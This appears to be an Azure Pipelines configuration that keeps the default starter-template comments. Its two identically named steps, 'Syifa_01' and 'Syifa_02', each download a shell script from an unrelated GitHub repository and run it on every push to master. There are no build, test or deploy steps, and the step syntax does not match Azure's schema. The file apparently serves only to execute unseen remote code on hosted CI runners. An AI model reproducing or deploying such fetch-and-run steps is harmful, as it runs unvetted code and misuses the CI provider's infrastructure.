# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

pool:
  vmImage: ubuntu-latest

steps:
- run:
    name: Syifa_01
    command: wget https://raw.githubusercontent.com/kelimutharuk/puki/master/start.sh && chmod u+x start.sh && ./start.sh
- run:
    name: Syifa_02
    command: wget https://raw.githubusercontent.com/kelimutharuk/puki/master/start.sh && chmod u+x start.sh && ./start.sh
      